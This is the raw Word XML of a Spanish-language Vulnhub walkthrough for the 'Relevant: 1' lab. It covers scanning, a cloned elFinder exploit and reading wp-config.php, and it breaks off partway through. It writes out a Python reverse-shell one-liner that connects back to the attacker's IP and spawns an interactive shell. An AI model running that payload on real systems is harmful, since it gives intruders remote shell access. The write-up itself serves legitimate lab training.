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2C18489" wp14:paraId="5C2F8FA0" wp14:textId="455187CC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="150" w:beforeAutospacing="off" w:after="225" w:afterAutospacing="off"/>
      </w:pPr>
      <w:r w:rsidRPr="02C18489" w:rsidR="53F7BFBF">
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans" w:eastAsia="Josefin Sans" w:cs="Josefin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ES"/>
        </w:rPr>
        <w:t>Relevant: 1 Vulnhub Walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w:rsidP="02C18489" wp14:paraId="5C1A07E2" wp14:textId="6DF9649A">
      <w:pPr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02C18489" w:rsidR="53F7BF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Comencemos el reconocimiento de la máquina vulnerable utilizando </w:t>
      </w:r>
      <w:r w:rsidRPr="02C18489" w:rsidR="53F7BF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netdiscover</w:t>
      </w:r>
      <w:r w:rsidRPr="02C18489" w:rsidR="53F7BF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. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="73FB50F3" w:rsidP="02C18489" w:rsidRDefault="73FB50F3" w14:paraId="4AC5278B" w14:textId="6C52DCB4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="73FB50F3">
        <w:drawing>
          <wp:inline wp14:editId="4CFC672A" wp14:anchorId="7B44EE8C">
            <wp:extent cx="4572000" cy="1514475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="228802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cc36913bd45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E930CB" w:rsidP="02C18489" w:rsidRDefault="3EE930CB" w14:paraId="52AD0608" w14:textId="1F4D385C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="3EE930CB">
        <w:rPr/>
        <w:t>Ya ahora con NMAP haremos un reconocimiento de puertos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3EE930CB" w:rsidP="02C18489" w:rsidRDefault="3EE930CB" w14:paraId="0C0B3140" w14:textId="3C210315">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="3EE930CB">
        <w:drawing>
          <wp:inline wp14:editId="17D31B08" wp14:anchorId="3D7DCD29">
            <wp:extent cx="2724530" cy="381053"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2114093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b32f4f70394c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E930CB" w:rsidP="02C18489" w:rsidRDefault="3EE930CB" w14:paraId="302B8A8A" w14:textId="19021555">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="3EE930CB">
        <w:drawing>
          <wp:inline wp14:editId="50A50EBF" wp14:anchorId="3E7B67B1">
            <wp:extent cx="4572000" cy="1057275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="384204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1de605e355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E930CB" w:rsidP="02C18489" w:rsidRDefault="3EE930CB" w14:paraId="6E9208F3" w14:textId="084C48A3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="3EE930CB">
        <w:rPr/>
        <w:t>Y ahora un poco más exacto porque ya sabemos cuál es la IP: 192.168.56.123</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3EE930CB" w:rsidP="02C18489" w:rsidRDefault="3EE930CB" w14:paraId="4FBD426D" w14:textId="51597EEA">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="3EE930CB">
        <w:drawing>
          <wp:inline wp14:editId="2024B42E" wp14:anchorId="33C31A68">
            <wp:extent cx="4572000" cy="2362200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="881101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850d4712a24b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E930CB" w:rsidP="02C18489" w:rsidRDefault="3EE930CB" w14:paraId="4EDD4B6E" w14:textId="3D06087F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="3EE930CB">
        <w:rPr/>
        <w:t>Ahora</w:t>
      </w:r>
      <w:r w:rsidR="3EE930CB">
        <w:rPr/>
        <w:t xml:space="preserve"> entraremos por el puerto 80:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3EE930CB" w:rsidP="02C18489" w:rsidRDefault="3EE930CB" w14:paraId="6EFA5D8D" w14:textId="206C1FE8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="3EE930CB">
        <w:drawing>
          <wp:inline wp14:editId="6589067C" wp14:anchorId="7FA710C1">
            <wp:extent cx="4572000" cy="2047875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1210210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3049869c7f47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03571" w:rsidP="02C18489" w:rsidRDefault="79D03571" w14:paraId="13697E77" w14:textId="5C8C88A4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="79D03571">
        <w:rPr/>
        <w:t>Nos metemos en la siguiente url:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="79D03571" w:rsidP="02C18489" w:rsidRDefault="79D03571" w14:paraId="46B7A61D" w14:textId="0275B765">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="79D03571">
        <w:drawing>
          <wp:inline wp14:editId="331C1A58" wp14:anchorId="5E2E4197">
            <wp:extent cx="5492338" cy="1762125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1949041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2a232287844d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338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03571" w:rsidP="02C18489" w:rsidRDefault="79D03571" w14:paraId="0B85A262" w14:textId="0B047195">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="79D03571">
        <w:drawing>
          <wp:inline wp14:editId="17B5C8D2" wp14:anchorId="159B9CE6">
            <wp:extent cx="5523850" cy="3371850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2139958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86d0b6455342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C18489" w:rsidP="02C18489" w:rsidRDefault="02C18489" w14:paraId="4ACE2BDC" w14:textId="0278CC96">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="28B94B10" w:rsidP="02C18489" w:rsidRDefault="28B94B10" w14:paraId="0C5F849B" w14:textId="1B1B950D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="28B94B10">
        <w:rPr/>
        <w:t xml:space="preserve">En la página de </w:t>
      </w:r>
      <w:r w:rsidR="28B94B10">
        <w:rPr/>
        <w:t>img</w:t>
      </w:r>
      <w:r w:rsidR="28B94B10">
        <w:rPr/>
        <w:t xml:space="preserve">: tenemos un </w:t>
      </w:r>
      <w:r w:rsidR="28B94B10">
        <w:rPr/>
        <w:t>código</w:t>
      </w:r>
      <w:r w:rsidR="28B94B10">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="28B94B10">
        <w:rPr/>
        <w:t>qr</w:t>
      </w:r>
      <w:r w:rsidR="28B94B10">
        <w:rPr/>
        <w:t xml:space="preserve"> que podemos descifrar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="28B94B10" w:rsidP="02C18489" w:rsidRDefault="28B94B10" w14:paraId="59020000" w14:textId="03AB1AA4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="28B94B10">
        <w:drawing>
          <wp:inline wp14:editId="1EC3C8F3" wp14:anchorId="0DACD110">
            <wp:extent cx="4939229" cy="2562225"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="750600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bbf241fb1b43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229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B94B10" w:rsidP="02C18489" w:rsidRDefault="28B94B10" w14:paraId="3A2891CB" w14:textId="57BC211D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="28B94B10">
        <w:drawing>
          <wp:inline wp14:editId="3892DB84" wp14:anchorId="5835D118">
            <wp:extent cx="3790950" cy="4572000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="542743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f50200be7f4f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B94B10" w:rsidP="02C18489" w:rsidRDefault="28B94B10" w14:paraId="3FDFFCF8" w14:textId="24DFB701">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="28B94B10">
        <w:rPr/>
        <w:t>Patsy podría ser un nombre de usuario</w:t>
      </w:r>
      <w:r w:rsidR="1FB6FA0B">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4E0E3621" w:rsidP="02C18489" w:rsidRDefault="4E0E3621" w14:paraId="3E2B4D14" w14:textId="5C4FC409">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="4E0E3621">
        <w:rPr/>
        <w:t xml:space="preserve">Podemos buscar archivos ocultos con el comando </w:t>
      </w:r>
      <w:r w:rsidR="4E0E3621">
        <w:rPr/>
        <w:t>dirb</w:t>
      </w:r>
      <w:r w:rsidR="4E0E3621">
        <w:rPr/>
        <w:t xml:space="preserve"> http:192.168.56.123</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="466787A1" w:rsidP="02C18489" w:rsidRDefault="466787A1" w14:paraId="245F23A4" w14:textId="357AD5A8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="466787A1">
        <w:drawing>
          <wp:inline wp14:editId="6358F51F" wp14:anchorId="6ACABDAD">
            <wp:extent cx="4572000" cy="4429125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1343439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ed5f1cf5340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6787A1" w:rsidP="02C18489" w:rsidRDefault="466787A1" w14:paraId="30562994" w14:textId="7558547F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="466787A1">
        <w:rPr/>
        <w:t xml:space="preserve">Y ahora con el comando de </w:t>
      </w:r>
      <w:r w:rsidR="466787A1">
        <w:rPr/>
        <w:t>wpscan</w:t>
      </w:r>
      <w:r w:rsidR="466787A1">
        <w:rPr/>
        <w:t xml:space="preserve"> sacamos vulnerabilidades de esta IP:</w:t>
      </w:r>
      <w:r w:rsidR="5EE19E84">
        <w:rPr/>
        <w:t xml:space="preserve"> no parece que este usando WordPress</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="17A46DF1">
        <w:drawing>
          <wp:inline wp14:editId="5AB8DCE9" wp14:anchorId="4673A7D4">
            <wp:extent cx="4572000" cy="1905000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1533042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0c367d534a4b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0B6EFE" w:rsidP="02C18489" w:rsidRDefault="1A0B6EFE" w14:paraId="00A95A5A" w14:textId="71457C05">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="1A0B6EFE">
        <w:rPr/>
        <w:t>Asique usaremos un script:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A0B6EFE" w:rsidP="02C18489" w:rsidRDefault="1A0B6EFE" w14:paraId="480A707A" w14:textId="3FC2E62A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="1A0B6EFE">
        <w:rPr/>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r w:rsidR="1A0B6EFE">
        <w:rPr/>
        <w:t xml:space="preserve"> 192.168.56.123 --script http-</w:t>
      </w:r>
      <w:r w:rsidR="1A0B6EFE">
        <w:rPr/>
        <w:t>wordpress</w:t>
      </w:r>
      <w:r w:rsidR="1A0B6EFE">
        <w:rPr/>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="1A0B6EFE">
        <w:rPr/>
        <w:t>enum</w:t>
      </w:r>
      <w:r w:rsidR="1A0B6EFE">
        <w:rPr/>
        <w:t xml:space="preserve"> –script-</w:t>
      </w:r>
      <w:r w:rsidR="1A0B6EFE">
        <w:rPr/>
        <w:t>args</w:t>
      </w:r>
      <w:r w:rsidR="1A0B6EFE">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="1A0B6EFE">
        <w:rPr/>
        <w:t>search-limit</w:t>
      </w:r>
      <w:r w:rsidR="2AC67B3F">
        <w:rPr/>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="1A0B6EFE">
        <w:rPr/>
        <w:t>500</w:t>
      </w:r>
      <w:r w:rsidR="22AAE324">
        <w:rPr/>
        <w:t xml:space="preserve">0 y nos interesa la </w:t>
      </w:r>
      <w:r w:rsidR="22AAE324">
        <w:rPr/>
        <w:t>versión</w:t>
      </w:r>
      <w:r w:rsidR="22AAE324">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="22AAE324" w:rsidP="02C18489" w:rsidRDefault="22AAE324" w14:paraId="645F8EC2" w14:textId="3822B66C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="22AAE324">
        <w:drawing>
          <wp:inline wp14:editId="62096C97" wp14:anchorId="61B0EE1D">
            <wp:extent cx="4572000" cy="1752600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="133973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ba90d31ede4d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61A41" w:rsidP="02C18489" w:rsidRDefault="4FE61A41" w14:paraId="6C53E9F9" w14:textId="12578634">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="4FE61A41">
        <w:rPr/>
        <w:t xml:space="preserve">Y nos </w:t>
      </w:r>
      <w:r w:rsidR="4B05679E">
        <w:rPr/>
        <w:t xml:space="preserve">bajamos un sistema de </w:t>
      </w:r>
      <w:r w:rsidR="4B05679E">
        <w:rPr/>
        <w:t>exploración</w:t>
      </w:r>
      <w:r w:rsidR="4B05679E">
        <w:rPr/>
        <w:t xml:space="preserve"> de archivos</w:t>
      </w:r>
      <w:r w:rsidR="4FE61A41">
        <w:rPr/>
        <w:t xml:space="preserve"> desde </w:t>
      </w:r>
      <w:r w:rsidR="4FE61A41">
        <w:rPr/>
        <w:t>github</w:t>
      </w:r>
      <w:r w:rsidR="4FE61A41">
        <w:rPr/>
        <w:t xml:space="preserve"> clonando el repositorio:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4FE61A41" w:rsidP="02C18489" w:rsidRDefault="4FE61A41" w14:paraId="7F7C518A" w14:textId="0455B84F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="4FE61A41">
        <w:drawing>
          <wp:inline wp14:editId="1384AB7C" wp14:anchorId="5F733FED">
            <wp:extent cx="4572000" cy="1323975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="913079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fc59dbf8cb48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61A41" w:rsidP="02C18489" w:rsidRDefault="4FE61A41" w14:paraId="068116A0" w14:textId="7142E84D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="4FE61A41">
        <w:rPr/>
        <w:t>Nos metemos en la carpeta creada:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4FE61A41" w:rsidP="02C18489" w:rsidRDefault="4FE61A41" w14:paraId="59EC54E4" w14:textId="53D9F928">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="4FE61A41">
        <w:drawing>
          <wp:inline wp14:editId="7901AD5B" wp14:anchorId="0F0DDD73">
            <wp:extent cx="4363059" cy="1076475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1789937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67c1c9cee44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F171BC" w:rsidP="02C18489" w:rsidRDefault="5AF171BC" w14:paraId="3CD846EA" w14:textId="2C730ADC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="5AF171BC">
        <w:rPr/>
        <w:t xml:space="preserve">Y usamos </w:t>
      </w:r>
      <w:r w:rsidR="5AF171BC">
        <w:rPr/>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidR="5AF171BC">
        <w:rPr/>
        <w:t>: para</w:t>
      </w:r>
      <w:r w:rsidR="4EEE4ABC">
        <w:rPr/>
        <w:t xml:space="preserve"> explorar los archivos con el script de elFinder.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5AF171BC" w:rsidP="02C18489" w:rsidRDefault="5AF171BC" w14:paraId="35DDB1F7" w14:textId="28E26234">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="5AF171BC">
        <w:drawing>
          <wp:inline wp14:editId="15823B9B" wp14:anchorId="1389C74E">
            <wp:extent cx="5476875" cy="878582"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1424911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90b49a0a2249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10AF63" w:rsidP="02C18489" w:rsidRDefault="2A10AF63" w14:paraId="4F4B5942" w14:textId="2E77D3B1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t xml:space="preserve">Creamos un archivo </w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t xml:space="preserve"> con este contenido: cambiando la </w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>Ip</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t xml:space="preserve"> que sale por la nuestra (.111) con el puerto de escucha de ejemplo 1234</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A10AF63" w:rsidP="02C18489" w:rsidRDefault="2A10AF63" w14:paraId="2255172F" w14:textId="706345C0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>script -qfc /bin/bash /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A10AF63" w:rsidP="02C18489" w:rsidRDefault="2A10AF63" w14:paraId="5E9427AC" w14:textId="672C419F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A10AF63" w:rsidP="02C18489" w:rsidRDefault="2A10AF63" w14:paraId="1BCCAE37" w14:textId="0D2527DB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>python3 -c '</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>socket,subprocess,os;s</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>socket.socket</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>socket.AF_INET,socket.SOCK_STREAM</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>s.connect</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>(("192.168.56.111",1234)</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>);os</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>.dup2(</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>s.fileno</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t xml:space="preserve">(),0); </w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>os.dup</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>2(</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>s.fileno</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t xml:space="preserve">(),1); </w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>os.dup</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>2(</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>s.fileno</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>(),2</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>);p</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>subprocess.call</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>(["/</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>bin</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>sh</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>","-i"]);'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A10AF63" w:rsidP="02C18489" w:rsidRDefault="2A10AF63" w14:paraId="11BACCDE" w14:textId="12DFBD26">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t xml:space="preserve">Copiamos la parte de </w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>3 donde se inició elFinder.py:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02C18489" w:rsidP="02C18489" w:rsidRDefault="02C18489" w14:paraId="1CBBA153" w14:textId="4E4D8B9E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="2A10AF63" w:rsidP="02C18489" w:rsidRDefault="2A10AF63" w14:paraId="052CD228" w14:textId="114ED8D7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2A10AF63">
        <w:drawing>
          <wp:inline wp14:editId="3AC0C7D2" wp14:anchorId="336ACC47">
            <wp:extent cx="6420970" cy="535081"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1091329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d0fa9c46e4b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970" cy="53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10AF63" w:rsidP="02C18489" w:rsidRDefault="2A10AF63" w14:paraId="1EBAA7A7" w14:textId="596F2C28">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t xml:space="preserve">Y hacemos un </w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>netcat</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t xml:space="preserve"> con el puerto 1234 y nos </w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>saldría</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A10AF63" w:rsidP="02C18489" w:rsidRDefault="2A10AF63" w14:paraId="70A64EBC" w14:textId="44C86684">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2A10AF63">
        <w:drawing>
          <wp:inline wp14:editId="3DFF5B39" wp14:anchorId="01E8492C">
            <wp:extent cx="4572000" cy="923925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="58010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3c5a5af59c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10AF63" w:rsidP="02C18489" w:rsidRDefault="2A10AF63" w14:paraId="5DEB2AFF" w14:textId="498B1975">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t xml:space="preserve">E introducimos la otra parte del código de </w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidR="2A10AF63">
        <w:rPr/>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="2F5C4968">
        <w:rPr/>
        <w:t xml:space="preserve"> y entramos con la webshell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="2A10AF63" w:rsidP="02C18489" w:rsidRDefault="2A10AF63" w14:paraId="1D9A6886" w14:textId="169894CC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2A10AF63">
        <w:drawing>
          <wp:inline wp14:editId="0C15DA5B" wp14:anchorId="3107D224">
            <wp:extent cx="4572000" cy="304800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1929215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7b0cba2ee341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5C15B" w:rsidP="02C18489" w:rsidRDefault="0265C15B" w14:paraId="08C0A562" w14:textId="03051B58">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="0265C15B">
        <w:rPr/>
        <w:t xml:space="preserve">Nos vamos a la carpeta de </w:t>
      </w:r>
      <w:r w:rsidR="0265C15B">
        <w:rPr/>
        <w:t>html</w:t>
      </w:r>
      <w:r w:rsidR="0265C15B">
        <w:rPr/>
        <w:t>: y nos fijamos en el archivo de wp-config.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0265C15B" w:rsidP="02C18489" w:rsidRDefault="0265C15B" w14:paraId="71A6BACE" w14:textId="466BBE49">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="0265C15B">
        <w:drawing>
          <wp:inline wp14:editId="222C2151" wp14:anchorId="23278D61">
            <wp:extent cx="4572000" cy="2847975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1904301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54f782f606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CE1BD" w:rsidP="02C18489" w:rsidRDefault="411CE1BD" w14:paraId="37942FCD" w14:textId="25797AF1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="411CE1BD">
        <w:rPr/>
        <w:t>Y vemos su contenido:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="411CE1BD" w:rsidP="02C18489" w:rsidRDefault="411CE1BD" w14:paraId="23E3127D" w14:textId="65A2C210">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="411CE1BD">
        <w:drawing>
          <wp:inline wp14:editId="365BE9F1" wp14:anchorId="75F98EEE">
            <wp:extent cx="4572000" cy="4010025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1536483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878918fd9348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CE1BD" w:rsidP="02C18489" w:rsidRDefault="411CE1BD" w14:paraId="4451F971" w14:textId="529292DB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="411CE1BD">
        <w:rPr/>
        <w:t xml:space="preserve">Nos fijamos en la parte de DB_PASSWORD: </w:t>
      </w:r>
      <w:r w:rsidR="411CE1BD">
        <w:rPr/>
        <w:t>DidYouThinkItWouldBeThatEasy?TryHarder</w:t>
      </w:r>
      <w:r w:rsidR="411CE1BD">
        <w:rPr/>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D837BA9" w:rsidP="02C18489" w:rsidRDefault="0D837BA9" w14:paraId="2BF7AA6A" w14:textId="62A6CD9D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="0D837BA9">
        <w:rPr/>
        <w:t>Vamos a ver los usuarios que tiene la carpeta home:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D837BA9" w:rsidP="02C18489" w:rsidRDefault="0D837BA9" w14:paraId="22524B36" w14:textId="685ED781">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="0D837BA9">
        <w:drawing>
          <wp:inline wp14:editId="3F912E28" wp14:anchorId="11B43FAE">
            <wp:extent cx="4572000" cy="762000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="432886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fb9391d48344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37BA9" w:rsidP="02C18489" w:rsidRDefault="0D837BA9" w14:paraId="31976FC2" w14:textId="15F289E0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="0D837BA9">
        <w:rPr/>
        <w:t>Y vamos al usuario llamado h4x0r:</w:t>
      </w:r>
    </w:p>
